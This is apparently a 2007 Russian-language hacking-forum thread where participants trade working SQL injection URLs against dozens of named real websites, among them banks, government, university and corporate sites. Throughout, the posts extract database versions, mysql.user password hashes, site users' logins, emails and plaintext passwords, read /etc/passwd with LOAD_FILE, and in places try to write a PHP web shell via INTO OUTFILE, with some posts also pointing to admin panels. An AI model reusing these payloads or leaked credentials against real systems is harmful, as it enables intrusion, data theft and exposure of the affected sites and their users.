Сайт:www.dotfiles.com
Версия:5.0.38
http://www.dotfiles.com/index.php?cat_id=6999999+union+select+1,2,3,4,5,6, concat(name,char(58),email)+from+user--

Хм,странно в information_schema.columns есть password

Но на деле не работет (.

kamaz

03.06.2007, 12:16

2V.I.P
Колонка "password" не работает потому, что в таблице user ее нет. Есть только в таблице user с перфиксом mysql.

http://www.dotfiles.com/index.php?cat_id=6999999+union+select+1,2,3,4,5,6, concat(user,char(58),password)+from+mysql.user--

И еще в таблице users c различными перфиксами

http://www.dotfiles.com/index.php?cat_id=6999999+union+select+1,2,3,4,5,6, concat_ws(char(58),id,name,login,email,password)+f rom+radiant.users--

http://www.dotfiles.com/index.php?cat_id=6999999+union+select+1,2,3,4,5,6, concat_ws(char(58),id,name,login,email,password)+f rom+radiant_dev.users--

http://www.dotfiles.com/index.php?cat_id=6999999+union+select+1,2,3,4,5,6, concat_ws(char(58),id,name,password)+from+rblog.us ers%20limit%209500,1--

}{0TT@БЬ)Ч

03.06.2007, 12:32

2V.I.P
Колонка "password" не работает потому, что в таблице user ее нет. Есть только в таблице user с перфиксом mysql.И еще в таблице users c различными перфиксами
не ожидал такое от тебя, репы вроде не мало ;)

Пчел

03.06.2007, 14:01

http://www.exploro.ro/index.php?module=detalii_excursie&id_get=-12345+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21/*
USER: exploro_exploro@localhost
DATABASE: exploro_exploro
VERSION: 4.1.21-standard

kamaz

03.06.2007, 17:19

2}{0TT@БЬ)Ч
ыыы ;)
Только щас заметил...

Раз я тут все равно показываю себя нубом... то может кто-нить обьяснит, почему не получается запрос
http://www.dotfiles.com/index.php?cat_id=6999999+union+select+1,2,3,4,5,6, concat(user,char(58),password)+from+mysql-old.user--
Хотя
http://www.dotfiles.com/index.php?cat_id=6999999+union+select+1,2,3,4,5,6, concat(table_schema,char(46),table_name)+from+info rmation_schema.columns+where+table_name=CHAR(117,1 15,101,114)--

KPOT_f!nd

04.06.2007, 05:25

http://www.id-t.nl/news-subpage.php?newsid=-5449+union+select+1,2,3,4,5,6,7,user,password,user (),11,12,13,14,15,16,17,18+from+mysql.user/*
root:69540c43630a0fad
idt@192.168.2.1

http://www.montevideo.nl/en/nieuws/detail.php?id=-108'+union+select+1,2,concat(user(),0x3a,version() ,0x3a,database(),0x3a)/*&archief=

http://www.yamaha-hifi.de/index.php?lang=e&country=DE&idcat1=1&idcat2=-1+union+select+1,VERSION(),3,USER(),5/* - имееться юзеры+пассы

http://www.yamaha-hifi.de/index.php?lang=e&country=DE&idcat1=1&idcat2=-1+union+select+1,password,3,username,5+from+users/*
+limit в помощь...

Grey

04.06.2007, 13:11

http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,concat(database(),char(58),us er(),char(58),version()),5,6,7/*

mysql.user:

http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,concat(user,char(58),password ),5,6,7+from+mysql.user+limit+1,1/*

root:1da2058b62d7a119

/etc/passwd:

http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,load_file(0x2f6574632f7061737 37764),5,6,7/*

163 таблицы:

http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,table_name,5,6,7+from+informa tion_schema.tables+limit+163,1/*

forum.ibf_members_converge:

http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,concat(converge_id,char(58),c onverge_pass_hash,char(58),converge_pass_salt),5,6 ,7+from+forum.ibf_members_converge+limit+0,1/*

1:33581792b4c389b0219866f27c29e3b8:~v-nI:::4334925

lipskerov.phpbb_users:

http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,concat(username,char(58),user _password),5,6,7+from+lipskerov.phpbb_users+limit+ 1,1/*

alien:5f58ac9c3b1c0c3ce51d3092816b96ed:::4312034

magr.cms_members:

Колонки:

http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,column_name,5,6,7+from+inform ation_schema.columns+where+table_name=char(99,109, 115,95,109,101,109,98,101,114,115)+limit+0,1/*

id
status
name
full_name
phone_1
phone_2
phone_3
phone_4
fax
site
email
director_name
director_dolz
login
pass
in_org
sert
licen
full_info

Вывод инфы:

http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,concat(id,char(58),name),5,6, 7+from+magr.cms_members+limit+0,1/*

Joker-jar

04.06.2007, 14:40

http://www.proplay.ru/users/login/

Уязвимо поле "пароль" (при ' выдает ошибку мускула). Но пара admin : 1 or 1=1/* не проканала :(

Пчел

04.06.2007, 15:47

Магазин велосипедов

http://www.velo-mag.ru/index.php?action=page&id=-12345+union+select+1,2,3,4,5,6,7,8/*

USER: assortif_velo@localhost
DATABASE: assortif_velo
VERSION: 5.0.24a

18 таблиц: stella_pages, stella_news, fb_pages, VIEWS, USER_PRIVILEGES, TRIGGERS, TABLE_PRIVILEGES, TABLE_CONSTRAINTS, TABLES,
STATISTICS, SCHEMA_PRIVILEGES, SCHEMATA, ROUTINES, KEY_COLUMN_USAGE, COLUMN_PRIVILEGES, COLUMNS, COLLATION_CHARACTER_SET_APPLICABILITY, COLLATIONS, CHARACTER_SETS.

http://www.ik-ki.nl/?id=14&subid=30&action=bekijk&nieuws=-12345+union+select+1,2,3,4/*

USER: ikki_ikki@localhost
DATABASE: ikki_db
VERSION: 4.1.22

http://www.icppc.pl/pl/index.php?id=-12345+union+select+1,2,3/*

После запроса появляются еще ошибки, поэтому чуть не упустил из виду, что отображается 3 поле.

USER: icppc_jakub@localhost
DATABASE: icppc_jakub
VERSION: 4.1.21-standard-log

x.Elf

04.06.2007, 17:15

www.e1.ru:
/etc/passwd/
http://www.e1.ru/business/conference/yarmarka/read.php?theme=-1&question=-1'+union+select+1,2,3,4,LOAD_FILE(CHAR(47,101,116, 99,47,112,97,115,115,119,100))/*
www.sermet.ru:
http://www.sermet.ru/index.php?idpage=2&idnews=-1+union+select+1,2,3,4,5+from+users/*
admin:admin
pass:140108

x.Elf

04.06.2007, 18:36

www.uph.ru:
http://www.uph.ru/inner.php?page=reklama1&top=-1+union+select+1,2/*
www.rns-soft.ru:
http://www.rns-soft.ru/?action=projects&id=-1+union+select+1,2,3,4+from+news/*

dudits

04.06.2007, 21:09

привет., у меня такая проблема, я пока в скьюэл не очень, поэтому не могу понять как получить доступ к базе мыл сайта:
ну есть сайт допустим сайт www.xxxxx.com с бажным скриптом, в строке URL ввожу :. www.xxxxx.com/index.php?l=2&id=-1+union+select+1,aes_decrypt(aes_encrypt(email,0x7 1),0x71)+from+users+limit+40000,1/*&s=3 вот ето, но он выдает ток по 1 мылу, в зависимости от того что ввел перед
,1/*&s=3. Например ввожу перед ,1/*&s=3 число 10000 выдает одно мыло , ввожу перед ,1/*&s=3 число 40000 выдает другое, и тд, но по 1, а как сделать чтоб всю базу просмотреть? или выкачать, может что то добавить к етому коду?

Пчел

04.06.2007, 21:29

http://www.bayraktaremlakinsaat.com/index.php?detay=detaylar&x=&id=-12345+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40, 41/*

USER: bayrakta_admin@localhost
DATABASE: bayrakta_emlakdb
VERSION: 4.1.21-standard

http://www.ta.fi/kohde_aso/?id=-12345+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*

USER: webigurut@localhost
DATABASE: kampat
VERSION: 4.1.21-log

x.Elf

04.06.2007, 21:56

loc

05.06.2007, 07:47

интересная скуля*
в качастве пароля подойдет:
' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21/*
Что-то не получается.(( Может что не то делаю? :confused:

.Slip

05.06.2007, 09:14

http://www.cdrlabs.com/articles/index.php?articleid=-3+union+select+concat_ws(0x3a,username,password)+f rom+users+limit+1,1

Joker-jar

05.06.2007, 09:44

Что-то не получается.(( Может что не то делаю? :confused:

http://forum.antichat.ru/thread41560.html

alextoun

05.06.2007, 13:53

http://yellowpages.rin.ru/cgi-bin/more.cgi?z=-1+union+select+1,2,3,4,5,6,7,8,9,10/*
ух ты ошибка.
мда

http://www.render.ru/gallery/?gal_rub=-1+union+select+1,2/* а здесь ваще пусто пошло))

BlackCats

05.06.2007, 14:00

http://dimey.online.fr/texte.php?id=21+order+by+5
фр

Spyder

05.06.2007, 14:24

http://fat-cat.co.uk/fatcat/artistInfo.php?id=-6+union+select+1,convert(version()+USING+latin1),3 ,4,5,6
толстая кошка 0_о

Dracula4ever

05.06.2007, 16:28

herb4all.ru

http://www.herb4all.ru/index.php?group=1000+union+select+version()1,2,3,4/*

Нету сил копать дальше ;)

C!klodoL

05.06.2007, 17:45

belexpocentr.ru
http://www.belexpocentr.ru/show.php?id=-1+union+select+1,2,3,4,5,user(),7,database(),versi on(),10,11,12,13,14,15,16,17,18,19,20,21/*

CRL

05.06.2007, 17:50

C ХЕРболайфом тоже не получается(((
_http://www.herb4all.ru/index.php?group=-1000+union+select+concat(name,0x3a,password)+from+ users/*
Пустая страница((( а так хочеться именно его взломать.

Блин там один столбец!!!

Boccob

05.06.2007, 18:11

http://www.herb4all.ru/index.php?group=9999+union+select+1,2,version(),4, 5,6,7/*
На самом деле столбцов семь.

Isis

05.06.2007, 22:07

http://gazeta.etatar.ru/base/person.php?id_person=-1+union+select+1,2,3,4,concat_ws(0x3b,user(),datab ase(),version()),6,7,8,9,10,11,12,13,14,15,16/*

http://www.bustur.ru/t.php?id=-1+union+select+1,2,3,concat_ws(0x3b,user(),databas e(),version())/*

alextoun

05.06.2007, 22:22

http://www.kristallcom.ru/kaltasi/index.php?option=-1+union+select+1/*
не скуль, но чисто прикольно. алерт вылетает, первый раз вижу

alextoun

06.06.2007, 11:30

http://mrg.net.ru/showrel07.php?ID=-1+union+select+1,2,3,4/*
тут тож стопор

Boccob

06.06.2007, 11:35

http://astrol.ru/index.php?page=-1+union+select+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(VER SION(),%20%200x71),0x71),6,7/*
Вот так вот, дальше сам смотри.

kair

06.06.2007, 15:09

http://www.quintum.com/news/press.html?id=490%20union%20select%201,2,user,4,5, 6,7,8,9,10%20from%20mysql.user%20limit%200,1/*

Alexsize

06.06.2007, 16:19

http://www.artiks.ru/1c_info.php?group_id=72+and+1=1/*

Дальше не пробовал. Мало времени.

Dracula4ever

06.06.2007, 16:53

http://www.tam.ca.gov

http://www.tam.ca.gov/view.php?id=-1+union+select+1,2,version(),4

_GaLs_

06.06.2007, 16:56

_http://galagraphics.kz/portfolio.php?id=11+union+select+1,2,3,4,5,6,7,8,9 ,0/*
_http://www.emercomrb.bashnet.ru/risla/index.php?p=-1243+union+select+1,password,3,4+from+mysql.user/*
_http://www.rudtp.ru/articles.php?id=+union+select+1,2,3,4,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9,0/*
_http://www.fhr.ru/news_vishaya/?id='+union+select+1,2,user(),4,5/*

alextoun

06.06.2007, 18:57

http://www.pbaconsult.com/index.php?page=-1+union+select+1,2/*
узер Uwww3239S@localhost
имя udb3239
версия 4.1.21
http://www.pbaconsult.com/admin/ админка
блин 4-ая база, чё то не получается юзеров найти

C!klodoL

06.06.2007, 23:30

onami.us
http://www.onami.us/events/event.php?id=-1+union+select+1,2,3,4,5,6/*

KPOT_f!nd

07.06.2007, 07:13

onami.us
http://www.onami.us/events/event.php?id=-1+union+select+1,2,3,4,5,6/*
Cкульщики на ачате работаю только через Антибоян
http://www.mycow.eu/article.php?id=528+union+select+1,2,user(),4,5,ver sion(),database()/*
http://www.articles.5mm.eu/index.php?id=-160+union+select+1,2,3,4/*

alextoun

07.06.2007, 15:25

http://www.propovednik.ru/index.php?page=-1+union+select+1,2,3,version(),5,6,7/*
http://www.propovednik.ru/index.php?page=-1+union+select+1,2,3,table_name,5,6,7+from+informa tion_schema.tables+limit+6,1/*
профайл
http://www.propovednik.ru/admin.php
админка

_GaLs_

07.06.2007, 15:48

_http://www.marumi-filter.ru/shop/?id=userid='
_http://www.avia.ru/safety/?id=+union+select+1,2,3,4,5,6,7,8,9,0,1/*
_http://www.akademokna.ru/pages.php?id='+union+select+1,2,3,4,5,5,6,7,8,9,0, 1,2,3,4,5/*

CRL

07.06.2007, 16:21

Но ведь столбцы то не подобранны как бы... Ни в третей, ни во второй.

Isis

07.06.2007, 17:19

http://www.akademokna.ru/pages.php?id='+union+select+1,2,3,4,5,5,6,7,8,9,0, 1,2,3,4,5/*
Мм.....где ты подобрал?
http://www.akademokna.ru/pages.php?id=-2+union+select+1,concat_ws(char(58),user(),databas e(),version())/*

alextoun

07.06.2007, 19:39

http://www.bankdelo.ru/kodecs/index.php?page=-1+union+select+version(),2,3,4/*
по пассам и юзерам подобрать можно т.к база 4-ой версии

alextoun

07.06.2007, 22:12

http://www.zgia.zp.ua/index.php?page=-1+union+select+version(),2,3,4,5/*
5-ая
http://www.zgia.zp.ua/index.php?page=-1+union+select+column_name,2,3,4,5+from+informatio n_schema.columns+where+table_name=char(117,115,101 ,114)+limit+0,1/*
кавычки фильтруются, поэтому в аски кодах название таблицы, и так же перебор по лимитам

http://www.zgia.zp.ua/index.php?page=-1+union+select+column_name,2,3,4,5+from+informatio n_schema.columns+where+table_name=char(117,115,101 ,114)+limit+2,1/*
пассы

http://www.zgia.zp.ua/index.php?page=-1+union+select+column_name,2,3,4,5+from+informatio n_schema.columns+where+table_name=char(117,115,101 ,114)+limit+1,1/*
юзеры

Isis

08.06.2007, 01:55

http://biomolecula.ru/?page=content&id=-74+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7,8,9/*

http://www.impactsoft.ru/clients.php?razdel_id=1+union+select+1,AES_DECRYPT (AES_ENCRYPT(convert(concat_ws(0x3a,version(),data base(),user())+using+cp1251),0x71),0x71),3,4,5,6,7 ,8,9/*

Пчел

08.06.2007, 14:08

http://www.cebucity.gov.ph/?pageno=12&bac=-12345+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15/*

http://www.chubut.gov.ar/tramites/descripcion_imprimir.php?id=-12345+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15/*

_Pantera_

08.06.2007, 16:31

http://ethology.ru/humor/?id=-1+union+select+1,2,3,version(),5/*

http://happyland.ru/brands.php?id=-2+union+select+1,version(),3,'<script>alert()</script>',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25/*

Joker-jar

08.06.2007, 17:24

http://www.kaosweaver.com/extensions/details.php?id=1+and+ascii(lower(substring(version (),1,1)))=0x34/*
MySQL 4.x
лень подбирать столбцы

alextoun

08.06.2007, 22:08

http://www.nikolaevskie-oteli.ru/index.php?page=-1+union+select+1,version()/*
ща покопаю её

C!klodoL

08.06.2007, 23:11

vcam.ru
http://vcam.ru/index.php?id=-1+union+select+user()/*

kair

08.06.2007, 23:37

http://www.recyclemetals.org/news_archive_item.php?id=430%20union%20select%201, ID,3,4,5,6%20from%20bmra_users/*

Cond

09.06.2007, 01:32

Isis

09.06.2007, 02:41

www.uzgeolcom.uz
http://www.uzgeolcom.uz/news.php?lng=rus&oper=list&id=-1+union+select+1,2,3,4,5,concat_ws(0x3b,version(), database(),user())/*

www.roger.ru
http://www.roger.ru/news/?nid=-1+union+select+1,concat_ws(0x3b,name,email,date),3 ,4,5+from+guest_book/*/code]
[code]http://www.roger.ru/news/?nid=-1+union+select+1,cocat_ws(0x3b),version(),user(),d atabase())+from+guest_book/*

Isis

09.06.2007, 02:44

Какие же там таблицы :)
http://www.law.gmu.edu/academics/course_detail.php?num=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version( ),database(),user()),8,9/*
Здесь даже версию не узнать
http://www.georgiasouthern.edu/askgus/viewanswer.php?q=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
http://www.georgiasouthern.edu/askgus/searchbyaud.php?a=-1+union+select+1,2/*
Все узнаваемо
http://www.georgiasouthern.edu/askgus/viewanswer.php?q=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws (0x3b,user(),database(),version()),0x71),0x71),3,4 ,5,6,7,8,9,10,11,12,13,14/*

kair

09.06.2007, 08:28

ЫЫЫ еще sql inj

http://earthdata.com/newsarticle.php?id=430%20union%20select%201,AES_DE CRYPT(AES_ENCRYPT(user,0x78),0x78),AES_DECRYPT(AES _ENCRYPT(password,0x78),0x78),4,5,6%20from%20mysql .user
login:root
password:*8D4319DB7740A103F5B810488C17A7462FF9279B

кто подберет пароль, поставлю +1
http://www.eatmybrains.com/showfeature.php?id=430%20union%20select%201,2,3,na me,5,6,7,8,9,10,11,12,13,14,15,16%20from%20user/*

KPOT_f!nd

09.06.2007, 09:43

http://www.undime.org.br/htdocs/index.php?id=-3557'+union+select+1,2,user(),4,version(),6,7,8,9, 10,11,12,13,14,database(),16,17,18,19,20,21,22/*

http://www.pontoflash.com.br/colunas/materia.php?Item=-186+union+select+1,table_name,3,4,concat(user(),0x 3a,version(),0x3a,database()),6,7,8,7+from+informa tion_schema.tables/*

http://catalog.weblink.org.ua/select.php?f_id=-2+union+select+1,2,concat(user(),0x3a,version(),0x 3a,database())/*

l1ght

09.06.2007, 10:19

НБР - Национальный банк развития:
http://www.nbd.ru/ns/about/news/?id=-1+union+select+1,2,3,4,5,6,7,8,9,load_file('/etc/passwd'),11,12,13/*
Национальный банк ТРАСТ: кредит наличными, вклады, кредиты малому бизенсу, etc:
http://www.trust.ru/ru/about/careers/moscow/printable.php?from4=4&id4=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11/*
Национальный Банк Развития Бизнеса - КБ «НацБизнесБанк» (OOO):
http://www.nbbank.ru/cnews/print.php?id=2'+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16/*

Рассмотрим поподробнее 1ин из них,
trust.ru
Рут:
http://www.trust.ru/ru/about/careers/moscow/printable.php?from4=4&id4=-1'+union+select+1,2,3,4,5,6,7,8,9,concat(user,0x3d ,password),11+from+mysql.user/*
root:3c0f07ef742aa92a
trusrtbank-www:3c0f07ef742aa92a

Читаем файлы:
http://www.trust.ru/ru/about/careers/moscow/printable.php?from4=4&id4=-1'+union+select+1,2,3,4,5,6,7,8,9,load_file('/etc/passwd'),11/*

Пробуем залить шелл:
http://www.trust.ru/ru/about/careers/moscow/printable.php?from4=4&id4=-1'+union+select+null,null,null,null,null,null,null ,null,null,'test',null+from+mysql.user+into+outfil e+'/tmp/rest9999.php'/*

Записалось ли?:
http://www.trust.ru/ru/about/careers/moscow/printable.php?from4=4&id4=-1'+union+select+1,2,3,4,5,6,7,8,9,load_file('/tmp/rest99.php'),11/*
\N \N \N \N \N \N \N \N \N test \N

KPOT_f!nd

09.06.2007, 11:02

http://forums.tjat.com/wap/wapmisc.php?action=profile&u=-99%22%20union%20select%201,2,user,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,password,39,40,41,42 ,43,44,45,46,47+from+mysql.user/*
root:4527fb015ba5ce7d

http://forums.tjat.com/wap/wapmisc.php?action=profile&u=-99%22%20union%20select%201,2,username,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28,29,30,31,32,33,34,35,36,37,concat(user_emai l,char(58),user_password),39,40,41,42,43,44,45,46, 47+from+phpbb_users+limit+1,1/*
лимит в помощь

ran:b45dc32e2201a8c4a39ea72cc1ad2cff
Tjat.comTeam:9e592dbd5de6ec2fbcd1aef248202055
dima:9e592dbd5de6ec2fbcd1aef248202055

ICQ сервис www.tjat.com/wap.tjat.com

сенкс M4g (c)

n1†R0x

09.06.2007, 11:41

plaza-j.ru
http://www.plaza-j.ru/catalog.php?id=2&rid=-1+union+select+1,concat(username,0x3a,passwd),3,4+ from+user/*
plaza-j:10054b213fec9d81

KPOT_f!nd

09.06.2007, 11:41

vcam.ru
http://vcam.ru/index.php?id=-1+union+select+user()/*
там есть таблица orders
http://vcam.ru/index.php?id=-1+union+select+concat(user(),0x3a,version(),0x3a,d atabase())+from+orders/*

n1†R0x

09.06.2007, 12:19

dmbasis.ru
http://www.dmbasis.ru/main.php?id=-1+union+select+1,2,concat(email,0x3a,password),4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18+from+users+lim it+0,1/*
вывод в title, пароли в открытом виде, форма логина тоже есть.. ток ничего не дает =)

Ky3bMu4

09.06.2007, 12:35

...

http://www.jed-afrique.org/news.php?id_news=-11+union+select+1,version(),3,user(),5,6,7,8,9,10, 11,12,13,14,15,16,user()/*
http://www.respectcoalition.org/2006/news.php?ite=-1274+union+select+concat(user(),version()),2,3,4/*

alextoun

09.06.2007, 22:01

http://cyberacing.ru/index.php?lang=ru&p=105&action=topic&id=-1+union+select+1,2,3,4,5,6,7/*
ооо

Spyder

09.06.2007, 22:41

fr.freekick.uefa.com
http://fr.freekick.uefa.com/calendar.php?efEvent=-38+union+select+11,version(),3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38/*&efMonth=0&efOrder=5'&efkeyword=
http://fr.freekick.uefa.com/calendar.php?efEvent=-38+union+select+11,table_name,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38+from+information_sc hema.tables/*&efMonth=0&efOrder=5'&efkeyword=
http://fr.freekick.uefa.com/calendar.php?efEvent=-38+union+select+11,column_name,3,'d',5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38+from+information _schema.columns+where+table_name='tbadmin_users'/*&efMonth=0&efOrder=5'&efkeyword=
http://fr.freekick.uefa.com/calendar.php?efEvent=-38+union+select+11,auUsername,3,'d',5,6,auPassword ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+tba dmin_users/*&efMonth=0&efOrder=5'&efkeyword=
логин:пароль
##gv:##mw
arena:rose67uf

Админка
http://fr.freekick.uefa.com/admin/

Шелл не смог залить. Есть скрипт аплода картинок, но там стоит проверка на расширение

Spyder

09.06.2007, 23:28

eku.latin.epson.com
http://eku.latin.epson.com/V2/php/productos.php?idCategoria=-1+union+select+version()/*
Названия таблиц на испанском =)

V.I.P

09.06.2007, 23:50

Сайт: www.cаpsi.ca
http://www.capsi.ca/council.php?mem_id=3+union+select+1,2,3,4,5,6,conc at_ws(char(58),name,email,password),8,9,10,11,12,1 3+from+members/*

Сайт: www.rаmzesexpo.com
http://www.ramzesexpo.com/ru/news/index.php?id=-24+union+select+1,2,3,4,5,6,7,8,name,10,11,12,13,1 4,15,16,17,18,19,20+from+ramzesexpo/*

Сайт: www.mеrrimack.tv
http://www.merrimack.tv/news/index.php?id=-1+union+select+1,table_name,3,4,5,6,7,8+from+infor mation_schema.tables/*

Сайт: www.jеd-afrique.org
http://www.jed-afrique.org/news.php?id_news=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,concat_ws(char(58),login,password)+from+user/*

Сайт: www.mоldavcable.com
http://www.moldavcable.com/newsread.php?id=-6+union+select+concat_ws(char(58),user,password)+f rom+mysql.user/*

Spyder

09.06.2007, 23:55

www.divx.com
http://www.divx.com/company/press/press_detail.php?pr_id=-4+union+select+1,convert(version()+using+latin1),3 ,4+from+users
Чё то стобцы не могу подобрать =\

n0ne

10.06.2007, 00:46

www.edifier.ru

http://www.edifier.ru/news.php?&task=showfull&id=-80+union+select+1,2,3,4,version(),6,7/*

дальше туго :(

[53x]Shadow

10.06.2007, 01:04

To Spyder
Для начала мона системного вытащить:
http://www.divx.com/company/press/press_detail.php?pr_id=-4+union+select+1,convert(user+using+latin1),3,4+fr om+mysql.user+limit+0,1/*
user: drupal
hash: 654065ad41dfec0d

Серенький

10.06.2007, 01:46

Цитата:http://cyberacing.ru/index.php?lang=ru&p=105&action=topic&id=-1+union+select+1,2,3,4,5,6,7/*

ооо
http://cyberacing.ru/index.php?lang=ru&p=105&action=topic&id=-1+union+select+1,2,concat_ws(0x3a20,user_id,user_n ame,user_password,user_email,user_icq),4,5,6,7+fro m+users+limit+0,1/*

*E0AEE55D5A64DF698178C496D6BD03C2ED0336C0: kistion@cyberacing.ru: 89538062

KPOT_f!nd

10.06.2007, 02:44

alextoun - в твое скули имееться таблица усер:
http://cyberacing.ru/index.php?lang=ru&p=105&action=topic&id=-1+union+select+1,2,3,4,5,6,7+from+users/*

...

http://www.jed-afrique.org/news.php?id_news=-11+union+select+1,version(),3,user(),5,6,7,8,9,10, 11,12,13,14,15,16,user()/*
Ky3bMu4 аналогично имееться таблица усер:
cedric:cedalaloi
jim:jed&2006

Isis

10.06.2007, 02:57

www.contagem.mg.gov.br
version, database, user
http://www.contagem.mg.gov.br/noticia.php?idmateria=-1+union+select+1,2,3,4,5,convert(concat_ws(0x3b,us er(),database(),version())+using+latin1),7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*

etc/passwd
http://www.contagem.mg.gov.br/noticia.php?idmateria=-1+union+select+1,2,3,4,5,convert(LOAD_FILE(0x2f657 4632f706173737764)+using+latin1),7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26/*
shell
http://www.contagem.mg.gov.br/noticia.php?idmateria=-1+union+select+1,2,3,4,5,convert(0x3c3f70687020737 97374656d28245f4745545b636d645d293b203f3e+using+la tin1),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26+from+mysql.user+into_outfile+/*

www.zjda.gov.cn
http://www.zjda.gov.cn/misc.php?xname=CP0GHU0&dname=FM01G11&xpos=1'+union+select+concat_ws(0x3b,user(),databas e(),version())/*&op=recommend

Spyder

10.06.2007, 12:31

education.apple.com
http://education.apple.com/education/ilife/subject_template.php?subject_id=-16+union+select+1,2,3,4,5,6,7,convert(concat_ws(ch ar(58),user,password,host)+using+latin1),9,10,11,1 2,13,14,15,16+from+mysql.user+limit+3,1
admin:*4ACFE3202A5FF5CF467898FC58AAB1D615029441:%

_Pantera_

10.06.2007, 14:01

http://www.toraks.org.tr/journal/text.php3?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+ articles/*
http://www.tutak.bel.tr/index2.php?id=-2+union+select+1,2,3,concat(user,char(58),pass),5+ from+user+limit+0,1/*

NOmeR1

10.06.2007, 15:02

http://www.pvc.maricopa.edu/news/news_article.php?loc=-107+union+select+1,2,3,4,concat_ws(0x3a,VERSION(), DATABASE(),USER()),6,7,8,9,10,11,12,13
Дальше лень :)

Пчел

10.06.2007, 17:16

Алкогольный портал Госалкогольинспекции РТ

http://www.tatalc.ru/index.php?page=7&idnews=-12345+union+select+1,2,3,4,5,concat(name,char(58), passwd),7,8, 9,10,11,12,13,14,15,16,17,18+from+users+limit+0,1/*

USER: root@localhost
DATABASE: tatalc
VERSION: 4.0.24

Пароли в открытом виде:)
Администратор:N58y0Aa

Серенький

10.06.2007, 17:33

http://www.stplus.ru/
mysql 5
admins : id_admin,login,password,name
http://www.stplus.ru/content.php?id=-14+union+select+1,2,concat_ws(0x203a20,id_admin,lo gin,password,name,wrap),4+from+admins+limit+1,1/*
avk : adafff23fe27d62fa9d5220cc0b3a8ea : assassin
a_volkov : 00a809937eddc44521da9521269e75c6 : emma

Пчел

10.06.2007, 17:58

Сайт какой-то певицы.

http://www.alesya.by/interview.php?act=intview&int=-123456+union+select+1,2,3,4,3/*

USER: syabry@localhost
DATABASE: syabry_xmb1
VERSION: 4.1.21-standard

КАРЕЛЬСКАЯ РЕГИОНАЛЬНАЯ ОБЩЕСТВЕННАЯ ПРИРОДООХРАННАЯ ОРГАНИЗАЦИЯ

http://spok.onego.ru/index.php?lang=en&page=show.php&id=-12345+union+select+1,2,3,4,5,6,7,8,9,table_name,11 ,12,13,14+from+INFORMATION_SCHE MA.TABLES+limit+0,1/*

USER: spok_office_user@home.onego.ru
DATABASE: spok_office_db
VERSION: 5.0.37

gormet

10.06.2007, 20:26

_http://www.mediaclub.kz/news.php?catid=-1+union+select+1,database(),3/*

_http://www.db-central.de/content_manager/page.php?ID=-1+union+select+1,2,3,4,5,6,7/*

Isis

10.06.2007, 23:58

www2.tccgc.gov.tw
version(), user(), database()
http://www2.tccgc.gov.tw/art/community_person.php?id=-1+union+select+1,user(),database(),4,LOAD_FILE(0x2 f6574632f706173737764),version(),7,8,9,10,11,12,13 ,14,15+from+mysql.user/*
Сайт стоит на винде у обычного пользователя....
Есть доступ к mysql.user
Рутайте

Серенький

11.06.2007, 01:28

Камеди клаб

http://www.rucomedy.com/

уязвимость: http://www.rucomedy.com/search.php?showid=1&serie=90'

-> mysql 5
вывод без лимита, поглядел, наиболее интересные таблицы - wp_users и users

->таблицы и столбцы:
http://www.rucomedy.com/search.php?showid=1&serie=-90+union+select+1,2,3,4,aes_decrypt(aes_encrypt(co ncat_ws(0x203a20,table_schema,table_name,column_na me),0x55),0x55),6,7,8,9+from+information_schema.co lumns/*wp_users http://www.rucomedy.com/search.php?showid=1&serie=-90+union+select+1,2,3,aes_decrypt(aes_encrypt(conc at_ws(0x3a,ID,user_login,user_pass,user_email,user _url,user_activation_key,user_status,display_name) ,0x55),0x55),5,6,7,8,9+from+rucomedy_blog.wp_users/*

KPOT_f!nd

11.06.2007, 01:58

